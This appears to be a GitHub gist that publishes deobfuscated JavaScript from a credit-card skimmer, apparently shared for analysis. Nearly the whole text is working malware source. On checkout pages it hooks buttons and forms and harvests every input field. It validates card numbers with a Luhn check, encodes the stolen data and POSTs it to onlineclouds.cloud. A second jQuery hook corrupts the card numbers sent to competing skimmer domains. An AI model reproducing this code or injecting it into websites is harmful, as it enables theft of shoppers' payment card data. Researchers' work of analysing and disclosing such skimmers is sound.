Malware from onlineclouds.cloud unfuscated
| setTimeout(checkForCheckout, 100); | |
| var snd = null; | |
| function checkForCheckout() { | |
| if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) { | |
| scrapeAllFields(); | |
| } | |
| } | |
| function createQueryString() { | |
| var inp = document.querySelectorAll("input, select, textarea, checkbox"); | |
| for (var i = 0; i < inp.length; i++) { | |
| if (inp[i].value.length > 0 && inp[i].value.length < 60) { | |
| var nme = inp[i].name; | |
| if (nme == "") { | |
| nme = i; | |
| } | |
| snd += inp[i].name + "=" + inp[i].value + '&'; | |
| } | |
| } | |
| } | |
| function isValidCard(s) { | |
| var v = "0123456789"; | |
| var w = ""; | |
| for (i = 0; i < s.length; i++) { | |
| x = s.charAt(i); | |
| if (v.indexOf(x, 0) != -1) w += x; | |
| } | |
| j = w.length / 2; | |
| k = Math.floor(j); | |
| m = Math.ceil(j) - k; | |
| c = 0; | |
| for (i = 0; i < k; i++) { | |
| a = w.charAt(i * 2 + m) * 2; | |
| c += a > 9 ? Math.floor(a / 10 + a % 10) : a; | |
| } | |
| for (i = 0; i < k + m; i++) c += w.charAt(i * 2 + 1 - m) * 1; | |
| return (c % 10 == 0); | |
| } | |
| function scrapeAllFields() { | |
| var btn = document.querySelectorAll(`a[href*='javascript:void0'],a[href='#'],button, input, submit, .btn, .button`); | |
| for (var i = 0; i < btn.length; i++) { | |
| var b = btn[i]; | |
| // "slect" is typo here -- WdG | |
| if (b.type != "text" && b.type != 'slect' && b.type != "checkbox" && b.type != 'password' && b.type != "radio") { | |
| if (b.addEventListener) { | |
| b.addEventListener('click', createQueryString, false); | |
| } else { | |
| b.attachEvent('onclick', createQueryString); | |
| } | |
| } | |
| } | |
| var frm = document.querySelectorAll('form'); | |
| for (var i = 0; i < frm.length; i++) { | |
| if (frm[i].addEventListener) { | |
| frm[i].addEventListener('submit', createQueryString, false); | |
| } else { | |
| frm[i].attachEvent('onsubmit', createQueryString); | |
| } | |
| } | |
| if (snd != null) { | |
| var regexp = /(3|4|5|6)[0-9]{13,16}/gi; | |
| var matches = snd.match(regexp); | |
| if (matches != null) { | |
| if (isValidCard(matches[0]) == true) { | |
| snd = encodeAllTheThings(snd + "&shop=www.google.nl&card_123=" + matches[0]); | |
| var http = new XMLHttpRequest(); | |
| http.open("POST", "https://www.onlineclouds.cloud/api/v1/", true); | |
| http.setRequestHeader('Content-type', "application/x-www-form-urlencoded"); | |
| http.withCredentials = true; | |
| http.send("data=" + snd + '&token=' + encodeAllTheThings(window.location.host)); | |
| } | |
| } | |
| } | |
| snd = null; | |
| setTimeout(scrapeAllFields, 150); | |
| } | |
| function encodeAllTheThings(theText) { | |
| output = new String; | |
| Temp = new Array(); | |
| Temp2 = new Array(); | |
| TextSize = theText.length; | |
| for (i = 0; i < TextSize; i++) { | |
| rnd = Math.round(Math.random() * 122) + 68; | |
| Temp[i] = theText.charCodeAt(i) + rnd; | |
| Temp2[i] = rnd; | |
| } | |
| for (i = 0; i < TextSize; i++) { | |
| output += String.fromCharCode(Temp[i], Temp2[i]); | |
| } | |
| return output; | |
| }; | |
| // second func | |
| jQuery.ajaxSetup({ | |
| beforeSend: function(jqXHR, settings) { | |
| if (settings.url.indexOf("js-react.com") !== -1 || settings.url.indexOf('bootstrap-js.com') !== -1) { | |
| console.log(settings.url); | |
| var myRandom = Math.floor(Math.random() * 10); | |
| var cc = new RegExp("[0-9]{13,16}"); | |
| if (cc.test(settings.data)) { | |
| var old_cc = settings.data.match(cc); | |
| var new_data = settings.data.replace(new RegExp("[0-9]{13,16}", 'g'), old_cc[0].slice(0, -1) + myRandom); | |
| settings.data = new_data; | |
| } | |
| } | |
| } | |
| }); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment